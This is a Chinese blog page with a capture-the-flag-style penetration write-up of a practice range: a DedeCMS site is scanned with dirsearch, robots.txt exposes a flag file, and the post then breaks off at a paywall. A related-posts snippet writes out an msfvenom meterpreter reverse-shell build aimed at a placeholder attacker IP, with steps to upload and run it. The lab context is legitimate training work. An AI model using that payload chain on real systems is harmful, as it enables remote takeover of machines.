西域大都护府 第四期cfs靶场 渗透记录

最新推荐文章于 2024-05-29 14:48:53 发布
最新推荐文章于 2024-05-29 14:48:53 发布
阅读量2k 收藏 4
点赞数 1
分类专栏: 渗透 文章标签: 安全 web安全 渗透测试 渗透 cfs
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/122389879
版权

西域大都护府 第四期cfs靶场 渗透记录

官方wp: https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w

内网拓扑图请添加图片描述

在这里插入图片描述感谢西域大都护府提供这么好的cfs靶场


1.DEDECMS

首先是dedecms,会员功能被关闭了,那个前台的登陆口没法用
在这里插入图片描述
ps.dedecms一些漏洞

文件上传的payload:https://zhzhdoai.github.io/2019/07/28/Dedecms%E5%90%8E%E5%8F%B0getshell%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/
后台getshell:
https://zhzhdoai.github.io/2019/03/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-DedeCMS%E5%90%8E%E5%8F%B0getshell/
爆破后台目录(这个我试了木有成功):
https://mochazz.github.io/2018/02/26/DEDECMS%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95%E6%8A%80%E5%B7%A7/

随便摸了摸还是准备先扫描网站目录
dirsearch用自己的字典扫了一下

python dirsearch.py -e php -s 1 -w worlist.dic -u http://xxx/
-s 是延迟访问

在这里插入图片描述
访问robots.txt
在这里插入图片描述

User-agent: * 
Disallow: /ffffffffllllllllllaaaaaaaagggggg22222222222.txt
Disallow: /plus/ad_js.php
Disallow: /plus/advancedsearch.php
Disallow: /plus/car.php
Disallow: /plus/carbuyaction.php
Disallow: /plus/shops_buyaction.php
Disallow: /plus/erraddsave.php
Disallow: /plus/posttocar.php
Disallow: /plus/disdls.php
Disallow: /plus/feedback_js.php
Disallow: /plus/mytag_js.php
Disallow: /plus/rss.php
Disallow: /plus/search.php
Disallow: /plus/recommend.php
Disallow: /plus/stow.php
Disallow: /plus/count.php
Disallow: /include
Disallow: /templets

访问 /ffffffffllllllllllaaaaaaaagggggg22222222222.txt,得到flag2

最低0.47元/天 解锁文章
shu天
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
cfs靶场内网渗透
qq_48511129的博客
01-16 385
靶场wp( 西域都护府制作的wp) https://mp.weixin.qq.com/s/3QEBMnbByWDSpfrXdJuGPg viper渗透效果
cfs靶场渗透训练
weixin_51458899的博客
03-11 3870
cfs靶场训练 cfs2 扫描目录 发现http://xxxxxx/1.txt [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sDp03hAT-1646929011562)(https://raw.githubusercontent.com/hmt38/abcd/master/image-20220130223150017.png)] 发现admin.php盲猜是后台页面,访问后发现 通过搜索上面的关键字,找到一篇博客https://www.laimooc.cn/page/
数据库之Mysql提权
最新发布
白帽黑客鹏哥的博客
05-29 1073
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
内网渗透CFS三层靶场渗透
yc11223344的博客
12-19 973
1.在连接target2的时候代理总是断开,反弹不了shell,后来重新启动msf,重新配置,最终获得了shell2.proxychains4使用不了sqlmap,不清楚什么原因。
Xray-强大的漏洞扫描工具
qq_59923059的博客
08-07 8073
xray 支持用户使用 YAML 编写 POCYAML 格式的 “值” 无需使用双引号包裹,特殊字符无需转义YAML 格式使内容更加可读YAML 中可以使用注释rules:生成器将 POC 保存到 YAML 文件后使用--poc🚩总结🚩:xray扫描器解放了我的双手.好好学习SRC天天有.我的公众号.各位大佬们.关注一下.在下感激不尽....
权限提升小结
qq_61475980的博客
03-07 806
来执行系统命令。效果是从 mysql权限 —> 系统权限条件:已知mysql中root的账号密码。
CFS.zip_CFS-GA_cfs
09-21
**CFS加密算法详解** CFS(Chaffing and Winnowing)是一种基于混沌理论的文件加密算法,由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”(添加混淆数据)和“Winnowing”...
CFS调度器(2)-源码解析.pdf
07-31
在Linux操作系统中, Completely Fair Scheduler (CFS) 是默认的调度器,负责高效地分配处理器时间给各个进程。本文将深入解析CFS调度器的源码,基于Linux 4.18.0版本。 首先,当一个新的进程通过`do_fork()`函数...
sched_fair.rar_batch_cfs
09-22
"Sched_fair.rar_batch_cfs" 提到的是完全公平调度器(Completely Fair Scheduler, CFS)中的两类任务调度策略:SCHED_NORMAL 和 SCHED_BATCH。这两个调度类在CFS框架下运行,确保系统资源的公平分配。 1. 完全公平...
CFS调度器(3)-组调度.pdf
07-31
4. `load_avg`用于记录整个用户组的负载平均值,这在多核系统中尤其重要,因为它有助于平衡各个CPU上的负载。 在多核系统中,每个用户组的调度实体会在每个CPU的`cfs_rq`上都有副本,以便进程可以在不同的CPU上并发...
CFS调度器(6)-总结.pdf
07-31
CFS( Completely Fair Scheduler,完全公平调度器)是Linux内核中的主要进程调度器,它致力于确保所有进程获得公平的CPU执行时间。在CFS中,引入了一个关键概念——虚拟时间片(vruntime),用于衡量进程对CPU资源...
vulhub漏洞—weblogic RCE
weixin_45808483的博客
12-02 1087
一开始只知道一个IP 212.129.248.63 使用nmap扫描开放的端口 经过尝试我们发现 7001 端口是我们的要打的靶机漏洞 使用 Xary 扫描 xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html 漏洞利用 ...
Weblogic远程代码执行漏洞(CVE-2020-14750)修复步骤--weblogic10.3.6版本
gyt931019的博客
03-19 375
Weblogic10.3.6有远程执行代码漏洞,更新最新weblogic解决该问题。
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现
qq_42430287的博客
12-20 1891
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现
WebLogic权限绕过(CVE-2020-14750)
m0_65150886的博客
12-28 702
Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞,该漏洞是CVE-2020-14882 补丁的绕过,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。2.Edge浏览器绕过登陆的url。
探针漏洞_长亭xray:一款自动化Web漏洞扫描神器(免费社区版)
weixin_36212493的博客
01-12 2138
xray 简介xray 是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持 Windows / macOS / Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。https://www.zhihu.com/video/1145001352550928384特色使用 go 语言编写,...
漏洞扫描器学习
weixin_45794666的博客
03-08 5592
工作原理 漏洞扫描器向目标计算机发送数据包,然后根据对方反馈的信息来判断对方的操作系统类型、开发端口、提供的服务等敏感信息。 端口扫描原理: 端口扫描的原理其实非常简单,简单的利用操作系统提供的connect()系统调用(有各种协议),与目标计算机的端口进行连接。如果端口处于侦听状态,那么connect()能够成功,否则,这个端口是不能用的,就是没有提供服务。 漏洞扫描原理 检测扫描目标主机中可能大量已知的漏洞,如果发现潜在漏洞可能,就报告扫描者。这种扫描器的威胁更大,因为黑客可以直接利用扫描结果进行
CVE-2020-14882/14883: Weblogic ConSole HTTP 协议代码执行漏洞通告
爱国小白帽
10-29 3640
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-29 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC已经公开,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HT
fscan安装配置(windows、linux系统)
热门推荐
m0_56305656的博客
06-15 1万+
fscan一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
cfs内网渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内网渗透,我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的网站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80端口号,访问网站。 3. 在网站上查找需要下载的文件,并下载到本地。 另外,我们还可以使用msfvenom生成一个meterpreter反向Shell,然后将其上传到CentOS 7靶机上进行下载。具体步骤如下: 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell,命令如下: ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中,`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号,`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上,可以使用scp命令,命令如下: ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中,`<username>`为CentOS 7靶机上的用户名,`<target IP>`为CentOS 7靶机的IP地址,`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件,命令如下: ```shell ./muma.elf ``` 运行后,反向Shell会连接到攻击者的机器,攻击者可以通过反向Shell进行下载等操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值